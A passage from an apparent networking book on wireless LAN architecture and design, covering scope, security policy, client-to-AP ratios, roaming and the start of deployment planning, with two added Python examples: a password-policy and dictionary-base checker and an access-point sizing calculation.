Defining the scope of your WLAN
Developing your timeframe to deploy
Considering IT security requirements
Identifying the types of users and devices you want to support
Establishing an operational support structure and process
The following sections describe each of these considerations in more detail.

Determining the Goal of the WLAN


Because of increased adoption, more applications and services are being layered onto the WLAN.
However, the number of applications utilizing wireless transport is not the only factor that is changing.
The characteristics of the applications themselves are changing as well.
Traditionally, WLANs in enterprises were intended only for data traffic. The key applications were typical
business productivity tools such as e-mail, web browsers, calendaring tools, and messaging. These
applications produce network traffic that is irregular and noncontinuous. Periods with high network
utilization are followed by periods of low network utilization, and the duration of both these periods is
unpredictable. The applications are considered "bursty" as they load the network in bursts.
As WLANs became more prevalent, they started to become the preferred means of network connectivity.
This resulted in bandwidth-intensive and potentially latency-sensitive applications such as video also
migrating onto the wireless medium. The challenge created by these applications is that they demand
a different type of service from the network. Best-effort service became insufficient as these applications
required high throughput and deterministic behavior.
A common issue with networked applications is that they are developed with little or no consideration for
the resources they require from the communications infrastructure. Application developers take into
consideration the notion of the network but typically fail to consider bandwidth and latency implications.
The (false) assumption is that the network is always available, that bandwidth is unlimited, and that
congestion and delays do not occur. As such, even though the applications and the network are tightly
coupled, they are typically developed and deployed as independent components.
It is exactly this decoupling that creates the burden of carefully planning your WLAN if you want to
successfully support the extension of your applications to the wireless environment. Hence, you should
start with the premise that the average application is not aware of the transport medium it is using; it
treats the network, wired or wireless, identically.
The challenge of applications not being aware of the network is compounded with WLANs. Indeed, most
applications are developed for the wired environment. Specific characteristics of WLANs are their lower
throughput and higher latency than their wired equivalents. This is typically not a problem for the bursty
applications. However, WLANs can cause additional challenges for applications that demand high data
rates or deterministic behavior.

The interaction between applications and the network is only one of the challenges that must be tackled
when defining a WLAN architecture. Defining a wireless architecture to support voice and video also
introduces specific problems that must be considered. The considerations include provisioning sufficient
bandwidth for latency-sensitive voice and video streams, implementing a quality of service (QoS)
solution, and ensuring fast roaming capabilities between cells. Refer to Chapter 4, "Supplementary and
Complementary Services," for additional details on supporting voice and video in WLAN environments.

Defining the Scope of Your WLAN


The scope or footprint of your WLAN deployment is one characteristic that you can easily define from the
start. However you define it (small, limited, partial, full-scale, or ubiquitous), there is a boundary to
which you can adhere. Although the scope of your WLAN deployment has a larger impact on the planning
and implementation phases, it also plays a role in the architecture.
The architecture must formalize and document the coverage your WLAN provides. The formalization of
the scope serves as a guide to ensure that you neither underengineer nor overengineer your WLAN
solution. Underengineering occurs when you provide insufficient resources to provide the intended
degree of service. Examples include inadequate coverage due to not deploying enough access points or
failing to incorporate the proper IT security standards for your organization.
Overengineering is the inverse case. This happens when more resources are supplied than are strictly
needed to implement your desired solution. In this scenario, you will have squandered both time and
money. An example of overengineering is deploying too many access points. In this case, you could
either be overlapping coverage of access points or providing coverage in areas where there is no need
for WLANs.
A key consideration when determining the scope of your WLAN is how you intend to provide operational
support. Today, enterprises that extend their global reach must deal with an increased number of
operational issues. Examples include selecting a scalable strategy and platform for managing the WLANs
RF spectrum as well as potentially hundreds of access points and thousands of client devices.
Leverage the scope as defined in the WLAN architecture as a planning tool. This structured approach
makes it easier to determine how you offer support at the different levels of the fault resolution path,
and how you plan to handle onsite resources for troubleshooting. Refer to Chapter 8, "Management
Strategies for Wireless LANs," for operational considerations and recommendations.

Developing Your Timeframe to Deploy


The next step is to develop a timeframe for deployment. In this case, time refers not only to the time
when you begin a deployment, but also to the time it takes to complete the deployment. The proper mix
of time, as it relates to the preparation, planning, design and implementation, is fundamental. Two
aspects of time concern WLAN architecture and design:
Making timely decisions
Implementing the decisions before they outdate themselves
Wireless data networking is no longer a budding technology. It has built up momentum to a point where
aspects of the technology are quickly superseded by more advanced features and functions. Figure 5-1
illustrates that as the time to deploy becomes extended, the probability that technology features will
make a significant jump becomes greater.

Figure 5-1. Deployment Versus Technology Evolution

To manage the time it takes to deploy, adopt the following practices when defining the architecture:
Stay familiar with developments in WLAN technology Set a goal of staying abreast of
standards to ensure that the technology does not date itself. Establish a frequency and process that
evaluates the market, and build a matrix to align the technology with the overall business direction.
Break up requirements into sections By segmenting your business needs, you can align your
technology solutions more easily and efficiently. Build a roadmap of the follow-on technologies that
can be adopted without requiring a major change in the architecture.
Remind yourself that the architecture is only a framework The architecture should not
become so detailed that it impedes the growth of the network. Maintain standards but avoid
defining specific engineering details in your WLAN architecture.

Considering IT Security Requirements


Many enterprises were reluctant to adopt wireless LANs because of the perceived security concerns. The
main causes for worry lay in the unbound and uncontrolled nature of the RF transport medium.
However, many tools and solutions have been developed that allow you to build a WLAN that is at least
as secure as its wired counterpart.
The WLAN architecture plays a key role in securing your WLAN because it explicitly identifies which
components must be incorporated as well as their interdependent relationships. The architecture thus
effectively defines the security chain, the policies that must be adhered to, and the procedures that must
be followed to secure your WLAN.
Because each WLAN component contributes in either a constructive or destructive way to the robustness
of the security solution, you must first identify each of these components. Examples of the components
include the following:
Passwords
Authentication and access methodology
Encryption and hashing standards
Devices and their respective operating systems

Note
Robust passwords form the foundation of security because they are used to unlock the gate to
the system. They should be sufficiently strong to prevent easy guessing or cracking.
Exhaustive, brute-force methods can eventually uncover any password except a one-time
password; therefore, the strategy for reusable passwords is to make discovery as challenging as
possible. Require the use of both uppercase and lowercase alphanumeric characters in addition
to special characters. Furthermore, the more characters you use in a password, the stronger it
becomes. You should use no less than a 10-character password. Two examples of passwords that
satisfy these rules are Ci$cOPr3## (Cisco Press) and G@W1re!3zz (Go Wireless). Note, however,
that both are character substitutions applied to a recognizable phrase; password-cracking tools
apply exactly such substitution rules to word lists, so the length and unpredictability of the
underlying text matter more than the substitutions themselves.
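The following example, added here and not part of the book, turns the note's policy into a check and puts a number on the two measures of strength it mentions. The composition rules (at least 10 characters, upper, lower, digit, special) are the ones stated in the note; the search-space estimate assumes the attacker knows only the length and character classes; and the substitution table and word list are a deliberately tiny, constructed stand-in for the much larger rule sets and dictionaries that cracking tools use. The point it makes is that the note's two example passwords pass the policy yet reduce to dictionary words once the substitutions are undone.

```python
import math
import string

MIN_LENGTH = 10
SPECIALS = set(string.punctuation)

# Constructed, deliberately small stand-in for the substitution ("leet") rules
# that password crackers apply; real rule sets are far larger.
LEET = str.maketrans({"$": "s", "@": "a", "0": "o", "1": "i", "3": "e",
                      "!": "i", "5": "s", "7": "t"})

# Constructed mini word list; a real check uses a full dictionary plus lists
# of passwords seen in breaches. Longest words first so the best match wins.
WORDLIST = sorted(["cisco", "press", "wire", "wireless", "password",
                   "welcome", "admin", "summer"], key=len, reverse=True)


def meets_policy(pw):
    """The composition policy from the note: >= 10 chars, upper, lower, digit, special."""
    return (len(pw) >= MIN_LENGTH
            and any(c.isupper() for c in pw)
            and any(c.islower() for c in pw)
            and any(c.isdigit() for c in pw)
            and any(c in SPECIALS for c in pw))


def brute_force_bits(pw):
    """log2 of the keyspace an exhaustive attacker faces if all they know is the
    length and which character classes appear (the note's brute-force case)."""
    alphabet = 0
    if any(c.islower() for c in pw):
        alphabet += 26
    if any(c.isupper() for c in pw):
        alphabet += 26
    if any(c.isdigit() for c in pw):
        alphabet += 10
    if any(c in SPECIALS for c in pw):
        alphabet += len(SPECIALS)
    return round(len(pw) * math.log2(alphabet), 1)


def dictionary_base(pw):
    """Undo common substitutions, keep only letters, and look for a dictionary
    word inside. Returns the word found, or None."""
    normalized = "".join(c for c in pw.lower().translate(LEET) if c.isalpha())
    for word in WORDLIST:
        if word in normalized:
            return word
    return None


def assess(pw):
    """Policy result, brute-force keyspace in bits, and the dictionary word the
    password is built on, if any."""
    return {"policy_ok": meets_policy(pw),
            "bits": brute_force_bits(pw),
            "dictionary_base": dictionary_base(pw)}


if __name__ == "__main__":
    for candidate in ("Ci$cOPr3##", "G@W1re!3zz", "crimson-teapot-orbit-47"):
        print(candidate, assess(candidate))
```

The third candidate fails the composition policy (no uppercase letter) yet has a far larger brute-force keyspace and no dictionary base, which is why a policy should weigh length and a dictionary or breached-password check at least as heavily as character classes.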

Next, the WLAN architecture must define how all the components are interrelated. This process not only
ensures that there are no gaps in the security chain, but also that weaker links can be strengthened or
more actively managed to provide a holistic and robust security posture. Clearly define the
authentication and access methodology, the selected encryption standard, and key management
policies.
The security policy and procedures that you define in your WLAN architecture must then be applied in
the design, implementation, and operation stages of your WLAN's lifecycle to ensure that security
considerations are not only included but also overarching. Chapter 7, "Security and Wireless LANs,"
details solutions and recommendations for tackling the challenge of constructing a secure WLAN.

Identifying the Types of Users and Devices You Want to Support


An important architectural consideration is the target audience. This aspect of the WLAN architecture is
directly related to the people or devices and how they use the WLAN. Every usage profile has its own
distinct set of considerations that needs to be included in the architecture. To simplify the challenge of
incorporating user and device considerations in your WLAN architecture, start by segmenting the WLAN
user-community by identifying common usage profiles.
The concept of user classes was introduced in Chapter 3. Classifying users allows you to determine the
degree of relevance of WLANs for subsets of the user community. Classification is performed by
grouping users who share common attributes. These profiles are based on the users' characteristic
requirements that include their primary applications, degree of mobility, bandwidth and latency
restrictions, level of security, and typical hours of operation.
Chapter 3 uses segmentation by mobility needs to define the different user classes. The classes are
named standard, mobile, roaming, hot-desk, and guest. You can opt to use these classes, or you could,
for example, simplify classification into three classes:
Highly mobile
Partially mobile
Nonmobile
Your WLAN architecture must not only identify the different user classes, but also specifically formalize
how the WLAN will support each of the respective classes. Figure 5-2 shows an example of a breakout of
users by mobility needs. A sample of job roles has been added for illustration. Note that this is an
illustration only and by no means definitive. For example, a factory worker might need no mobility in
one type of role (manufacturing) but require high mobility in another role (warehouse management).

Figure 5-2. Users by Type and Class

In addition to the WLAN user considerations, the architecture needs to identify which devices can or
must be supported. When thinking about devices, focus on physical attributes. These include tethering,
battery life, interoperability, computational horsepower, durability, and control on placement.
For example, clients might be intelligent and mobile such as laptop computers, or dumb and fixed as, for
instance, printers and cameras. Handheld scanners can be used for a finite amount of time before their
batteries run out. Finally, the placement of PDAs is hard to control, creating potential security hazards.
Different devices have capabilities and limitations that, if supported correctly, ensure performance at the
desired expectations. The architecture must frame which devices will be supported by the WLAN and
provide guidelines regarding their expected performance, potential pitfalls that are unique to the wireless
environment, and problem mitigation strategies.
Plan for the use of devices of different manufacture. Although standards exist, each device is certain to
carry its own inherent features, which can result in future compatibility challenges. In the enterprise,
where enforcement of standards can be more readily managed, it might be easy to control such issues,
however, there are instances where this is not the case. A prime example is a university deployment. In
providing access to its student body, a university needs to support a broad assortment of end devices,
operating systems, and client software.
Have your WLAN architecture provide a framework and guideline for how you will support your
heterogeneous client base in a comprehensive and structured manner. Explicitly define the different user
classes and their respective application characteristics and include details on how the specific devices will
be supported.

Establishing an Operational Support Structure and Process


You manage the WLAN through provisioning and operational control. Provisioning is the management of
systems or devices by sending configurations down to them. You can do this actively or passively. Active
provisioning is a repeat process, such as a nightly download. Passive provisioning is performed only
when a change is required.
Operational control is the traditional network management whereby systems and devices are monitored.
Reactive operational control is performed by waiting for an event or alert and then acting upon it.
Proactive operational control is performed by examining data for trends or capturing signs of trouble
before an event occurs.
Given the importance of post-deployment support, your WLAN architecture should explicitly define
expectations and baseline standards for the WLAN's operational support structure. This should be the
case irrespective of the actual management strategy you already have or want to put in place. Strike a
careful balance between customization, complexity, and value because too much customization will likely
yield diminishing returns. Refer to Chapter 8 for more details on recommended operational practices.

Design Considerations
The previous section provided guidelines for defining the overarching architecture for your WLAN. The
framework formalizes the goal, scope, supported device types, and lifecycle management strategy for
your WLAN. More specifically, the architecture defines the strategy for the WLAN's security posture and
practices, as well as the WLAN's implementation and operational support structure. The architecture
does not, however, address detailed design considerations.
The WLAN design provides the necessary detail on how the solution must be built, integrated, and
configured. As such, the design of your WLAN must specify network topologies, how many access
points you need to deploy, their make and model, specific AP configurations, where and how you will
connect the WLAN to the rest of the network, IP addressing schemes, QoS parameters, access point
management passwords, and so on. In short, the design is focused on the physical layout and
configuration of the WLAN.
Many of the decisions that must be made during the design of wired networks are directly applicable in
the wireless environment. However, there are also distinct considerations that are unique to WLANs,
including the following:
The ratio of users to access points, also known as the client-to-AP ratio
The impact of roaming from cell to cell
The physical placement of the access points
This section focuses on the design decisions that need to be made regarding the client-to-AP ratio and
roaming capabilities. Chapter 6, "Wireless LAN Deployment Considerations," provides guidelines for
identifying the appropriate physical placement of the access points during the implementation of the
WLAN.

Client-to-AP Ratio
Many different factors impact the performance of your WLAN. Internal aspects include the shared nature
of the communication medium, the access mechanism for the medium, the use of a limited number of
communications channels, and the available bandwidth. External factors consist of the number of users,
the types of devices communicating across the WLAN, the types of applications used on the network and
the degree of mobility that is demanded by the user community.
As outlined earlier in the section "Identifying the Types of Users and Devices You Want to Support,"
knowing the traffic types and usage patterns on the WLAN is fundamental to designing a solution that
not only performs correctly, but also delivers a relatively consistent level of service. As such, providing
the WLAN with the proper number of access points is probably the single most important factor in
creating a WLAN that meets a performance baseline.

The industry has converged on the metric "client-to-access point ratio" to denote the number of users a
single access point can consistently support; however, do not take the term "client" at face value.
Indeed, a student who uses the WLAN primarily for e-mail and web browsing will have different
bandwidth requirements than an engineer using the WLAN mainly for streaming video and
computer-aided design (CAD) applications. As such, carefully consider the types of clients and their
respective network needs.

Note
The client-to-AP ratio is expressed as a number such as 10:1. In this case, the number 10
represents the recommended maximum number of clients that can be associated to an AP at
any given time. Exceeding this ratio will degrade the expected performance.

Three different strategies can be used to determine what the correct client-to-AP ratio is for your
environment. You can perform benchmark tests to identify exactly what works, you can classify users
and traffic types as in Table 5-1 to generate more granular client-to-AP ratio specifications, or you can
simply adopt client-to-AP ratio guidelines that have been published by most vendors. Each strategy has
its merits and drawbacks.
Benchmarking enables the most precise identification of the client-to-AP ratio. Local variations are
measured and the ratio can be optimized depending on the exact user profiles and needs. However, not
only is this approach time and resource intensive, but it also creates a dated snapshot. If the
environment changes, for example, and the HR and engineering departments introduce new software
with different traffic signatures, the benchmarks will no longer be accurate.
By classifying both traffic and users, as detailed in Chapter 3, some degree of customization can be
captured. The process is relatively straightforward and can be performed by your network architects and
designers. A challenge that you will likely face with this method is the identification of the correct
segmentation of the users and traffic types. Don't reinvent the wheel. Follow the classification guidelines
as set forth in your architecture. Given the benefits of more accurately identifying a client-to-AP ratio
that yields a more consistent and satisfactory WLAN user experience, we recommend that you adopt this
approach.
The final strategy is to accept the recommended client-to-AP ratio as published by the WLAN equipment
vendor. Even though this is the easiest solution, there is potential for over- or underprovisioning the
number of access points because the information provided by the vendor does not consider your specific
user-base requirements. However, use the WLAN vendor's published recommendations as a sanity
check.
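The classification strategy and the vendor-ratio sanity check can be put side by side in a short calculation. The example below is added here and is not the book's Table 5-1 or any vendor's guidance. It assumes a flat vendor ratio of 30:1, roughly 20 Mbps of usable throughput per 802.11g cell, a 70% target utilization, and a 50-association cap per AP; the two sites, their user classes, and the per-client loads and busy-hour concurrency are constructed. The class-based figure is driven by offered load, so it asks for more APs than the flat ratio when heavy users are present and fewer when the population is light.

```python
import math

# Constructed user classes: (class name, number of clients, offered load per
# active client in Mbps, fraction of those clients active at the busy hour).
# The loads and concurrency figures are assumptions for the example.
ENGINEERING_OFFICE = [
    ("email/web", 40, 0.2, 0.5),
    ("video/CAD", 15, 3.0, 0.8),
]
STUDENT_LAB = [
    ("email/web", 40, 0.2, 0.5),
]


def aps_required(classes, ap_usable_mbps=20.0, target_util=0.7,
                 max_assoc=50, vendor_ratio=30):
    """Size a coverage area by user class and compare with a flat vendor ratio.

    ap_usable_mbps: throughput one cell really delivers (assumed ~20 Mbps for a
                    54 Mbps 802.11g AP once protocol overhead is removed).
    target_util:    keep each cell below this share of its usable throughput.
    max_assoc:      hard association limit per AP (assumed vendor figure).
    vendor_ratio:   the flat "N clients per AP" guidance being sanity-checked.
    """
    clients = sum(n for _, n, _, _ in classes)
    demand_mbps = sum(n * load * active for _, n, load, active in classes)
    per_ap_mbps = ap_usable_mbps * target_util

    by_throughput = max(1, math.ceil(demand_mbps / per_ap_mbps))
    by_assoc_cap = max(1, math.ceil(clients / max_assoc))
    by_vendor = max(1, math.ceil(clients / vendor_ratio))
    recommended = max(by_throughput, by_assoc_cap)   # both limits must hold

    return {
        "clients": clients,
        "demand_mbps": round(demand_mbps, 1),
        "by_throughput": by_throughput,
        "by_association_cap": by_assoc_cap,
        "by_vendor_ratio": by_vendor,
        "recommended": recommended,
        "effective_ratio": round(clients / recommended, 1),
    }


if __name__ == "__main__":
    print("engineering office:", aps_required(ENGINEERING_OFFICE))
    print("student lab       :", aps_required(STUDENT_LAB))
```

For the office, the video and CAD users push the offered load to about 40 Mbps, so three APs are needed where the 30:1 rule would have placed two; for the lab, the same rule would place two APs for a population that one cell carries comfortably. The vendor ratio is still useful as the sanity check the text recommends: a class-based result that differs from it by a large factor deserves a second look at the assumed loads.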

Roaming
Roaming occurs when a device moves its association from one access point to another. By moving the
association, the device has effectively traversed the basic service set (BSS) boundary and moved into a
new one. However, roaming is not limited to crossing BSS boundaries.
As mentioned in Chapter 1, "Introduction to Wireless LAN Technologies," the BSS is equivalent to a
Layer 2 network. Multiple BSSs can be grouped together into an extended service set (ESS), which in this
book's usage equates to a Layer 3 network. (Strictly, 802.11 defines an ESS as a set of BSSs sharing an
SSID and a distribution system; the Layer 3 boundary arises when different ESSs are placed in different
IP subnets.) As such, changing the association from one access point to another can cause the client to
roam not only across BSS boundaries, but also across ESS boundaries.
Authentication is not the only area that is affected when a client moves its association from one access
point to another. Roaming across BSS boundaries creates the following three challenges:
Authentication
Performance
ESS boundaries
Each vendor offers its own solution for these challenges, and each solution has its own strengths and
weaknesses. In the end, it is important to understand the impact of roaming. The following sections take
a closer look at the challenges that are created by roaming and provide recommendations for addressing
them.

Authentication
If you opt to use authentication to secure your WLAN, switching association from one AP to another
triggers a re-authentication process. The new AP does not know that the client is permitted to associate
and, therefore, the client must go through the entire authentication process. As the number of times a
station roams and the number of stations roaming increases, latency can be introduced due to the
authentication traffic and the authentication processing overhead that is handled by the AP.
Note that authentication does not occur only when a client roams. To increase the robustness of WLAN
security, it is not uncommon that authenticated credentials expire after a certain amount of time. When
this occurs, the station is forced to re-authenticate. In this scenario, a station authenticates multiple
times over the duration of its association with the same access point even though it is not physically
roaming.
Some WLAN products provide methods to reduce the number of authentication requests that are sent to
the authentication, authorization, and accounting (AAA) infrastructure. This process is often known as
fast roaming, because the authenticated status of the client is stored locally in the access point or
controller, thereby avoiding the need to contact the back-end AAA server directly. This reduces the time
for authentication (hence "fast roaming") and the load on the AAA servers themselves.

Performance
Performance is not limited to the throughput that a client can achieve. It is also directly related to the
client keeping its network connection and communication session intact. When roaming, there is a small
amount of time during either authentication or association during which the client will effectively be
without a link. The duration of the lost link will determine if and how applications will be impacted. Note
that fast roaming was specifically conceived to make this link loss during authentication almost
unnoticeable to end users.
Applications exhibit a distinctive sensitivity to the duration of a lost link. Transactional applications such
as e-mail and web browsing are relatively insensitive, whereas real-time applications such as voice and
video are highly sensitive. Ensure that you enable fast roaming to make authentication occur promptly
enough to not affect the core WLAN application suite.

ESS Boundaries
As mentioned earlier, roaming occurs when a station moves its association from one access point to
another. This effectively makes the station jump from one BSS cell into the next. As long as the client
remains in the same ESS, its IP address remains valid and the Layer 3 session can be maintained.
If, however, the station crosses an ESS boundary, it effectively moves into a different Layer 3 network.
The IP address that was assigned for the old ESS is invalid, and all active IP sessions terminate as traffic
directed toward the station is incorrectly routed. To remediate this routing problem, the client must
release its old IP address and request a new one for the subnet that it now finds itself in.
To keep the IP sessions alive, some mechanism is needed to transfer the active connections. A method
of achieving this is by employing Mobile IP, which is an open protocol that comes in different forms but
allows clients to move between Layer 3 networks or subnets. However, keep in mind that Mobile IP is no
longer the primary mobility method for most vendors. Because it requires client software, it is currently
used only in "extreme" roaming situations like those found in moving vehicles with multiple available
network types. Most vendors today use some kind of tunneling technology to hide the fact that the user
has crossed a Layer 3 network boundary. This tunneling solution is similar to that used for remote VPN
access. In essence, a logical overlay of multiple ESSs is instantiated by means of the tunnels, thus
enabling roaming without Layer 3 hazards.
If you do not opt to implement solutions that provide Layer 3 roaming capabilities, carefully plan the
layout of your WLAN subnets to address this challenge. Avoid creating multiple ESSs in areas where
users typically roam. For example, because users typically move around on a floor, create a single ESS
per floor. However, a floor-by-floor model can have problems in certain buildings where there is strong
signal propagation between floors. In these types of buildings, users can accidentally roam between
floors, creating the problems previously described. Carefully measure signal strength on each floor and
fine-tune the radio's signal power to avoid it propagating between floors.
Also, consider recommended practices for sizing IP subnets. Subnets that are too large can experience
performance issues because of excessive IP broadcast traffic. Adopt the recommended IP addressing
practices when designing your WLAN. Plan carefully and strike a balance.

Environmental Considerations
The environment, be it a building, country, or climate, in which the WLAN operates plays a critical role in
defining the architecture and design of WLANs. Chapter 1 introduced the various environmental factors
that have an impact on the performance of the WLAN. Examples included the attenuation and distortion
of radio signals by various materials and the multipath effect.
The architecture should account for the variables of the environment without actually providing specific
details on remediation methods. The design, however, must include specifications on how the WLAN will
accommodate local variations.
When defining your WLAN's architecture and design, you need to consider the following three
environmental matters:
Physical attributes of the surroundings
RF environment
Local governmental regulations
The following sections describe each point in detail.

Physical Attributes of the Surroundings
Physical attributes of the surroundings include both the placement and type of obstacles in open spaces.
The obstacles are any foreign objects that the propagating RF signals encounter. The objects can be
static, such as furniture, walls, warehouses, and buildings, or dynamic like cars, forklifts, and even
people.
The exact type or movement of the obstacle is not important. What is important is that all matter affects
the radio signal by modifying the profile and strength of the original signal, which is known as distortion
and attenuation, respectively. As the signal's quality and strength decrease, the receiving stations have
a harder time reconstructing the original message, and this is accompanied by a reduction in
throughput.
Include considerations about the physical environment in your architecture by defining what the
minimum acceptable signal quality and strength should be because they determine which throughput
your WLAN can sustain. For example, requirements for a signal that must consistently support 54 Mbps
throughput will be a lot more stringent than an environment where throughput can throttle between 54
Mbps and 11 Mbps. These guidelines should then be used for the design of the WLAN to determine how
many access points are required and where they should be placed.

RF Environment
Physical obstacles are not the only kind of entities that can impact the strength and quality of an RF
signal. Other RF signals that are in the vicinity interfere with the original signal and modify its profile.
Whereas the visible concerns can be managed in a straightforward manner, the invisible cannot. Even in
controlled deployments, you can expect to contend with other nearby WLAN deployments. Furthermore,
devices like wireless phones, microwaves, handheld radios, and Bluetooth devices will have some impact
on RF signal quality because (in most cases) they share the same RF space.
The best way to combat the challenge of interference is to carefully and purposely design your WLAN
cells. Fix the throughput rate of your cells. Building your WLAN with well-defined cells aids in the control
and troubleshooting of these unknowns. An additional benefit of carefully controlling the footprint of the
radio cells is a higher degree of security. Chapter 7 covers the security considerations in more detail.
WLAN protocols are designed to throttle throughput as a function of the strength and quality of the signal.
As the footprint of the cell is related to the throughput, varying rates result in changing cell sizes. For
example, in 802.11b, cells that are fixed at 11 Mbps are significantly smaller than those that are fixed at
2 Mbps. Pegging the throughput rate creates a fixed cell size that is an easier-to-use building block for
designing your WLAN. The ability to design the network with standard and well-known parameters also
makes it easier to set the expectations of the user and troubleshoot the WLAN.

Local Governmental Regulations
One of the most overlooked aspects of WLANs in the global enterprise is the different regulations and
limitations that are imposed on WLANs and, specifically, the RF spectrum in which they operate.
Regulations surrounding RF are managed by both national and regional bodies, and significant disparities
can exist between respective local regulations. Be aware of potential differences in RF regulations, know
which regulatory bodies are relevant in your specific case, and know where to consult them. Include
both the regulatory requirements and the correct local solutions in both your architecture and design.

Summary
This chapter discussed the key architectural, design, and environmental considerations that are required
for WLANs. It emphasized the need for the architecture to be a framework as opposed to a blueprint,
thus providing flexibility for the designer. You learned about guidelines and recommended practices for
defining a robust WLAN architecture, including the following:
Determining the goal of the WLAN
Defining the scope of your WLAN
Developing your timeframe to deploy
Considering security requirements and implications early
Identifying the types of devices you want to support
Establishing an operational support structure and process
Adopting a financially responsible and conservative position
Confirming the staffing model for building and maintaining the WLAN
This chapter also discussed the most important design considerations that are specific to WLANs. The
need and methods for determining the correct client-to-AP ratio were covered as well as the challenges
that are created by roaming of stations.
Finally, the environmental considerations that are essential for defining a WLAN architecture and design
were highlighted. The impact of the physical environment, nearby radio signals, and local governmental
regulations was looked at in addition to recommended practices for managing these challenges.

Chapter 6. Wireless LAN Deployment Considerations

Deploying an enterprise-class WLAN is a complex and lengthy process that requires you to deal with
many interdependent factors. Chapter 3, "Preparation and Planning," introduced the prepare, plan,
design, implement, operate, and optimize (PPDIOO) solutions lifecycle. Using this model, the
deployment of an enterprise-class wireless network falls under the implement phase of the lifecycle, as
shown in Figure 6-1.

Figure 6-1. Implementation Phase

During the implementation phase, the architecture and technical design you have defined is deployed
into your production environment. Many of the questions and issues raised in earlier chapters will now
have a direct impact upon your deployment plans. Topics such as the breadth and scope of your
deployment may dictate how you actually deploy and implement your solution.
Although there are no hard and fast rules for deploying enterprise-class WLANs, this chapter provides
some real-world, tried and tested strategies that have proven successful in large-scale deployments.
Deploying an enterprise-class WLAN is a complex and lengthy process. You must deal with many
interdependent factors. The following sections briefly discuss some of the high-level factors that you
must consider or address and summarize a proposed process in a WLAN deployment checklist.

In-House Deployment Versus Outsourced Deployment
One of the first decisions you must make before proceeding with a deployment is whether to use your
own internal IT resources or to outsource the deployment to a skilled and experienced vendor. In many
circumstances, and depending upon the scale of the deployment, you may end up doing a combination
of both. Some of the factors that may help you make this decision are listed in the next sections.

Internal Staff
Advantages to using internal staff for your deployment include the following:
It is potentially cheaper for small- to medium-sized deployments.
Your IT team can increase their wireless skills.
Your staff has end-to-end visibility and familiarity with the solution, as opposed to your team taking
ownership of a "fully baked" WLAN solution that was designed and deployed by third parties.
You avoid potential security concerns associated with engaging external vendors to work on your
enterprise network.
Conversely, utilizing limited internal resources also has several disadvantages. These include but are not
limited to the following:
Deployment may take longer due to resource constraints.
Your staff may make common mistakes and encounter challenges that an experienced solutions
provider would avoid.
Your IT department may not already have wireless skills and experience.
Your IT department may not have the required equipment on hand.
Your staff will have ongoing responsibilities and possibly other projects to complete.

Outsourced Resources
An alternative strategy to using internal resources is to retain outside help. Many large enterprises
choose to engage an outside vendor either for the complete deployment or to provide additional
resources for the implementation phase.
Some advantages of using external vendors include the following:

They will be wireless experts and potentially have certified wireless engineers.
The vendor may have national or international presence in locations to which your staff would
otherwise have to travel.
The vendor will have extensive experience, often with deployments very similar to yours.
They will not need as much time to "ramp up" and commence the installation.
They will usually provide dedicated project management capabilities.
The vendor can work to an agreed Service Level Agreement (SLA), often with penalty clauses for
project delays.
Following are several of the disadvantages:
The cost involved may be higher.
Introducing a third party into the deployment creates management and administrative overhead.
Permitting a third party access to your network might raise security concerns.
Of course, many of these disadvantages associated with using external resources can be mitigated. For
example, additional cost of using external resources may be offset by the savings you make by utilizing
the vendor's local presence in a large national or international deployment. The time spent to develop
and increase the wireless skills of your internal staff may pay dividends later with improved
troubleshooting and technical abilities in-house. Security concerns with using external vendors for
sensitive network infrastructure projects can be mitigated or entirely addressed by careful management.
Carefully consider whether to use in-house or outsourced resources before you start. Many internally
resourced deployments have encountered problems only to resort to calling in assistance later, while
some outsourced projects have had costs spiral out of control. If you have tasked a program
management office (PMO) with the implementation of the WLAN, ensure that the PMO carefully monitors
and manages relationships with external vendors, and ensures smooth workflow between all
stakeholders and teams.

Architectural Milestones
Before proceeding with an actual deployment, there are some significant architectural milestones that
must be met first:
Solutions architecture
Bill of Materials
Security posture

Solutions Architecture
You must have a clearly defined architecture and a sound technical design before proceeding with your
implementation. This may seem like stating the obvious, but neglecting to clearly define and validate
fundamental architectural issues or specific technical designs is common. Do not attempt to learn as you
go because the project will lose focus, costs will spiral, and the likelihood of success will decrease
dramatically.
Chapter 5 describes the steps in defining a robust, scalable, and enterprise-class architecture in detail.

Bill of Materials
A Bill of Materials (BOM) is a comprehensive list of the equipment required for any project. One should
be produced to avoid delays before you commence the deployment. It is important that you estimate as
accurately as possible the specific infrastructure equipment you will require before the deployment
begins because this will avoid unnecessary delays during the actual implementation. Remember that you
might experience a lag of several weeks when ordering your equipment, depending upon the
manufacturer and the size of your WLAN.
As described in Chapter 3, based upon the throughput required to support your applications, the number
of users, the estimated number of concurrent users, the floor space to be covered and so on, you should
be able to roughly calculate the number of access points you will need. For enterprise deployments, this
is most often denoted as a "client to access point ratio"; this could be 10:1, for example, indicating that
you would deploy roughly one access point for every ten users.
However, if your plan is to deploy over a long period of time, you may wish to postpone purchasing
some of the equipment until the project is underway because this will avoid stockpiling equipment.

Security Posture
It is vital that you have clearly defined your security posture and put in place the required infrastructure
to support it before you begin deploying your WLAN. Factors such as the Extensible Authentication
Protocol (EAP) mechanism you select will help dictate what authentication, authorization, accounting
(AAA) infrastructure you need. If you have chosen to deploy in a geographically dispersed environment,
you may need to install additional AAA servers and perhaps even WAN circuits.

Deployment Dependencies
Before the first access point is turned on, the first cable laid, or the first client device enabled, you need
to be aware of some fundamental deployment dependencies. Your team may have finalized the
architecture and technical design, but you should ensure that centralized infrastructure and system-wide
policies are installed and implemented before the installation of the access points begins. You do not
want engineers turning up at a site to install access points or distribute clients before the site is ready for
them. We recommend that you perform at a minimum the following preparatory steps.

Change Management Process
Most large enterprises already have a Change Management process defined. The use of Change
Management will ensure that your deployment plans, or indeed the underlying architecture, does not
change during the implementation phase. Managing change and reducing "operational churn" reduce the
program costs and therefore help ensure a successful deployment.

Note
Change Management
The objective of change management is to execute changes economically and in a timely
manner while mitigating their risk and impact. Every carefully managed enterprise project and
service should have a change management process defined. This ensures changes do not
happen in a haphazard or uncontrolled manner.
This is achieved by the following formal steps. First, all requests for change are documented,
reviewed, and approved. Second, changes are appropriately developed and tested before and
after implementation. Third, implementation plans are documented, communicated, and
coordinated between change implementers and relevant end-users.
The effectiveness and benefits of change management include
Early detection of risks
Fewer service quality problems
Information on planned and implemented changes
Increased service stability leading to increased productivity
Ability to revert to prechange state
Improved management of a high volume of change

Put the Supporting Infrastructure in Place
Ensure that sufficient wired and supporting infrastructure is in place. This includes providing sufficient
wired Ethernet ports for each access point and confirming that you have sufficient power capacity
